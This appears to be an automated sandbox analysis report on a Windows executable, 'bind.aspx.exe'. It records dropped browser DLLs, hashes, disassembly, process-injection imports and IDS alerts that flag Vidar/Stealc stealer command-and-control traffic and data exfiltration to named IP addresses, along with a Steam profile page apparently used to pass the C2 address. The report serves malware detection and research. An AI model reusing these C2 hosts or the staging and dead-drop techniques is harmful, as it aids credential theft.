                                                                                                                                                                                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\ProgramData\GCAEHDBAAECB\mozglue.dll

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):608080
                                                                                                                                                                                    Entropy (8bit):6.833616094889818
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\ProgramData\GCAEHDBAAECB\msvcp140.dll

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):450024
                                                                                                                                                                                    Entropy (8bit):6.673992339875127
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\ProgramData\GCAEHDBAAECB\nss3.dll

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2046288
                                                                                                                                                                                    Entropy (8bit):6.787733948558952
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\ProgramData\GCAEHDBAAECB\softokn3.dll

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):257872
                                                                                                                                                                                    Entropy (8bit):6.727482641240852
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                    MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\ProgramData\GCAEHDBAAECB\vcruntime140.dll

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):80880
                                                                                                                                                                                    Entropy (8bit):6.920480786566406
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                    MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\76561199761128941[1].htm

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):34730
                                                                                                                                                                                    Entropy (8bit):5.39953096398384
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:3dpqme0Ih3tAA6WGAsfcDAVTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2S8:3d8me0Ih3tAA6WGAsFVTBv++nIjBtPFB
                                                                                                                                                                                    MD5:6C9824452D933009C8A087BF0479C611
                                                                                                                                                                                    SHA1:10CD2BC4C437CB7DDC6139C773758CEDF7B74E46
                                                                                                                                                                                    SHA-256:DAAC0F9ACED9D8CE794E9E4DFDE18351633260EA5A81EF732FA9F5A0560D14C0
                                                                                                                                                                                    SHA-512:20AA85167D8DA74522D319FF5F0B49C4B7806AA60E1D73AF1906044D35AE6A065A568803B1420A0E264B7BF443AFE3124D542D57D91C5E9EED31FD13B1E22726
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: b@b# https://135.181.31.18|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link hre

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\delays.tmp

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    File Type:ISO-8859 text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1048575
                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:fTf/:L
                                                                                                                                                                                    MD5:26E35B97CC5212411DF1A6E8C470C458
                                                                                                                                                                                    SHA1:E76AE58004DD441E3EAD02C8B20AF289B14E00AA
                                                                                                                                                                                    SHA-256:6295A461F9AA64507FA474B3C5262B862654D9D6F750360B06F67F83B814DE61
                                                                                                                                                                                    SHA-512:81B1255AF30EDA42BE3FDDCF2B989648410F839B16BC1A7377D50E0DE79CE54BE2A39B1B75A3DAB8463F8491DA7F50387BBE23C1679B3703CAC185F853F1407C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    Static File Info

                                                                                                                                                                                    General

                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Entropy (8bit):6.803977435313322
                                                                                                                                                                                    TrID:
                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                    File name:bind.aspx.exe
                                                                                                                                                                                    File size:5'424'128 bytes
                                                                                                                                                                                    MD5:9c49281d063296a545c79bf288d4c3bf
                                                                                                                                                                                    SHA1:403babf2b5811ba796517ce45235d261ad858620
                                                                                                                                                                                    SHA256:3a29214c3a66734c4213be2307f42e30568548e4f0493eb246be3cdc1345ceb1
                                                                                                                                                                                    SHA512:373554c2a6fc6625a0f0154cb17d15bc08117002d95f0c477e0646d44eceb6e9b2ac24f871bd5b402e06db2b9feb7e54379b1b9671c8e5bed2b1e7368591eda0
                                                                                                                                                                                    SSDEEP:98304:Q4Po4Zx7ojYK3zPfNsnigfraV3/x21RNPa9SeR7Tf8J1Q+SS5/nO8:QOxkMK3zPCniYGV48eSS5vO8
                                                                                                                                                                                    TLSH:D546BE02EA8654B6E84721B2754EA37F0D30A6315B32CAC7D7C45DA89F726D2533E70B
                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d.]. .3. .3. .3.O...+.3.O.....3.)...%.3.).....3...2.#.3. .2...3.O.....3.O...!.3.Rich .3.........PE..L......f...................

                                                                                                                                                                                    File Icon

                                                                                                                                                                                    Icon Hash:00928e8e8686b000

                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                    General

                                                                                                                                                                                    Entrypoint:0x41549f
                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                    Time Stamp:0x66C996B8 [Sat Aug 24 08:15:52 2024 UTC]
                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                                    OS Version Minor:1
                                                                                                                                                                                    File Version Major:5
                                                                                                                                                                                    File Version Minor:1
                                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                                    Subsystem Version Minor:1
                                                                                                                                                                                    Import Hash:7b5a8d7a6a007050bb3907e879153095

                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                    Instruction
                                                                                                                                                                                    push ebp
                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                    sub esp, 30h
                                                                                                                                                                                    push ebx
                                                                                                                                                                                    push esi
                                                                                                                                                                                    push edi
                                                                                                                                                                                    call 00007FDE14BA351Ch
                                                                                                                                                                                    push 000007CEh
                                                                                                                                                                                    call 00007FDE14BA3592h
                                                                                                                                                                                    mov dword ptr [esp], 00421EF8h
                                                                                                                                                                                    call dword ptr [0041E0B4h]
                                                                                                                                                                                    mov ebx, eax
                                                                                                                                                                                    test ebx, ebx
                                                                                                                                                                                    je 00007FDE14BB7996h
                                                                                                                                                                                    mov esi, dword ptr [0041E06Ch]
                                                                                                                                                                                    push 00421EF0h
                                                                                                                                                                                    push ebx
                                                                                                                                                                                    call esi
                                                                                                                                                                                    push 00000014h
                                                                                                                                                                                    pop edi
                                                                                                                                                                                    push edi
                                                                                                                                                                                    mov dword ptr [00B379F8h], eax
                                                                                                                                                                                    call eax
                                                                                                                                                                                    push edi
                                                                                                                                                                                    call dword ptr [00B379F8h]
                                                                                                                                                                                    push edi
                                                                                                                                                                                    call dword ptr [00B379F8h]
                                                                                                                                                                                    push edi
                                                                                                                                                                                    call dword ptr [00B379F8h]
                                                                                                                                                                                    push edi
                                                                                                                                                                                    call dword ptr [00B379F8h]
                                                                                                                                                                                    push edi
                                                                                                                                                                                    call dword ptr [00B379F8h]
                                                                                                                                                                                    push 00421EE0h
                                                                                                                                                                                    push ebx
                                                                                                                                                                                    call esi
                                                                                                                                                                                    push edi
                                                                                                                                                                                    mov dword ptr [00B37B1Ch], eax
                                                                                                                                                                                    call dword ptr [00B379F8h]
                                                                                                                                                                                    push edi
                                                                                                                                                                                    call dword ptr [00B379F8h]
                                                                                                                                                                                    push edi
                                                                                                                                                                                    call dword ptr [00B379F8h]
                                                                                                                                                                                    push edi
                                                                                                                                                                                    call dword ptr [00B379F8h]
                                                                                                                                                                                    push edi
                                                                                                                                                                                    call dword ptr [00B379F8h]
                                                                                                                                                                                    push edi
                                                                                                                                                                                    call dword ptr [00B379F8h]
                                                                                                                                                                                    push 00421ED0h
                                                                                                                                                                                    push ebx
                                                                                                                                                                                    call esi
                                                                                                                                                                                    mov dword ptr [00B37A78h], eax
                                                                                                                                                                                    call 00007FDE14BA3439h
                                                                                                                                                                                    push 0000000Ch
                                                                                                                                                                                    pop esi
                                                                                                                                                                                    push esi
                                                                                                                                                                                    call dword ptr [00B379F8h]
                                                                                                                                                                                    push esi
                                                                                                                                                                                    call dword ptr [00B379F8h]
                                                                                                                                                                                    push esi
                                                                                                                                                                                    call dword ptr [00000000h]

                                                                                                                                                                                    Rich Headers

                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                    • [ASM] VS2010 build 30319
                                                                                                                                                                                    • [ C ] VS2010 build 30319
                                                                                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                    • [C++] VS2010 build 30319
                                                                                                                                                                                    • [LNK] VS2010 build 30319

                                                                                                                                                                                    Data Directories

                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x24ff80xb4.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x7390000xb0.rsrc
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x73a0000x230c.reloc
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x1e0000x1f4.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                    Sections

                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                    .text0x10000x1c1800x1c200c887633b76487fe658ec5d7c45117705False0.5033680555555555data6.336336842549846IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .rdata0x1e0000x7a760x7c00162121d1f03922c7faf0bab34f757dd9False0.5923639112903226data6.061416848375361IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .data0x260000x7129280x500a00a9af4b328aa3adc89cd317e8b96e231eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                    .rsrc0x7390000xb00x20067096704ebdaa56d1bd5325233bdff04False0.279296875data4.10220545050508IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .reloc0x73a0000x75c80x76007ea4593987699164a1e8da24ac6b7c75False0.2464247881355932data2.829522439616615IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                    Resources

                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                    RT_MANIFEST0x7390580x56ASCII text, with CRLF line terminatorsEnglishUnited States1.0232558139534884

                                                                                                                                                                                    Imports

                                                                                                                                                                                    DLLImport
                                                                                                                                                                                    msvcrt.dll_EH_prolog, memset, memcmp, strcmp, rand, strncpy, malloc, _wtoi64, atexit, ??_V@YAXPAX@Z, memchr, strcpy_s, _time64, __CxxFrameHandler3, strtok_s, strchr, memcpy, ??_U@YAPAXI@Z, strlen, memmove, srand
                                                                                                                                                                                    KERNEL32.dllLCMapStringW, WideCharToMultiByte, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, ExitProcess, GetCurrentProcess, FlsAlloc, HeapAlloc, GetProcessHeap, HeapFree, MultiByteToWideChar, ConvertDefaultLocale, SetCriticalSectionSpinCount, GetLastError, ReadFile, CloseHandle, WriteFile, CreateFileW, GetTempPathW, Sleep, GetProcAddress, lstrlenA, GetStringTypeW, SetThreadContext, WriteProcessMemory, VirtualAllocEx, ReadProcessMemory, GetThreadContext, VirtualQueryEx, OpenProcess, GetComputerNameA, FileTimeToSystemTime, CreateProcessA, WaitForSingleObject, CreateThread, GetDriveTypeA, GetLogicalDriveStringsA, CreateDirectoryA, LoadLibraryA, SetFilePointer, GetFileSize, GetFileInformationByHandle, lstrcpyA, MapViewOfFile, CreateFileMappingA, CreateFileA, SystemTimeToFileTime, GetLocalTime, GetTickCount, lstrcatA, InterlockedDecrement, GetCurrentThreadId, SetLastError, InterlockedIncrement, TlsSetValue, TlsGetValue, GetModuleFileNameW, GetStdHandle, GetModuleHandleW, RtlUnwind, LoadLibraryW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, TerminateProcess, DecodePointer, RaiseException, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer
                                                                                                                                                                                    USER32.dllGetDesktopWindow, wsprintfW, MessageBoxA, GetWindowContextHelpId, GetWindowLongW, RegisterClassW, IsWindowVisible, IsDialogMessageW, CharToOemA
                                                                                                                                                                                    ADVAPI32.dllRegOpenKeyExA, RegGetValueA, GetUserNameA, GetCurrentHwProfileA
                                                                                                                                                                                    SHELL32.dllSHFileOperationA
                                                                                                                                                                                    ole32.dllCoSetProxyBlanket, CoInitializeSecurity, CoInitializeEx, CoCreateInstance
                                                                                                                                                                                    OLEAUT32.dllVariantInit, SysAllocString, SysFreeString, VariantClear
                                                                                                                                                                                    SHLWAPI.dll

                                                                                                                                                                                    Possible Origin

                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                    EnglishUnited States

                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                    2024-09-28T03:29:40.788591+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749709135.181.31.18443TCP
                                                                                                                                                                                    2024-09-28T03:29:42.362925+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749710135.181.31.18443TCP
                                                                                                                                                                                    2024-09-28T03:29:43.812034+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749711135.181.31.18443TCP
                                                                                                                                                                                    2024-09-28T03:29:45.267797+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749712135.181.31.18443TCP
                                                                                                                                                                                    2024-09-28T03:29:46.063893+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1135.181.31.18443192.168.2.749712TCP
                                                                                                                                                                                    2024-09-28T03:29:46.754710+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749713135.181.31.18443TCP
                                                                                                                                                                                    2024-09-28T03:29:47.529852+02002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.749713135.181.31.18443TCP
                                                                                                                                                                                    2024-09-28T03:29:47.530135+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11135.181.31.18443192.168.2.749713TCP
                                                                                                                                                                                    2024-09-28T03:29:48.313001+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749714135.181.31.18443TCP
                                                                                                                                                                                    2024-09-28T03:29:49.305343+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749715135.181.31.18443TCP
                                                                                                                                                                                    2024-09-28T03:29:50.425961+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749716135.181.31.18443TCP
                                                                                                                                                                                    2024-09-28T03:29:51.744737+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749717135.181.31.18443TCP
                                                                                                                                                                                    2024-09-28T03:29:53.368387+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749718135.181.31.18443TCP
                                                                                                                                                                                    2024-09-28T03:29:54.811226+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749719135.181.31.18443TCP
                                                                                                                                                                                    2024-09-28T03:29:56.315413+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749720135.181.31.18443TCP
                                                                                                                                                                                    2024-09-28T03:29:58.709652+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749721135.181.31.18443TCP
                                                                                                                                                                                    2024-09-28T03:30:00.892970+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749722135.181.31.18443TCP
                                                                                                                                                                                    2024-09-28T03:30:02.576777+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749724135.181.31.18443TCP
                                                                                                                                                                                    2024-09-28T03:30:05.277005+02002054495ET MALWARE Vidar Stealer Form Exfil1192.168.2.74972595.164.119.16280TCP

                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Sep 28, 2024 03:29:38.552025080 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                                                    Sep 28, 2024 03:29:38.552073956 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:29:38.552159071 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                                                    Sep 28, 2024 03:29:38.568361998 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                                                    Sep 28, 2024 03:29:38.568381071 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:29:39.216140985 CEST44349708104.102.49.254192.168.2.7
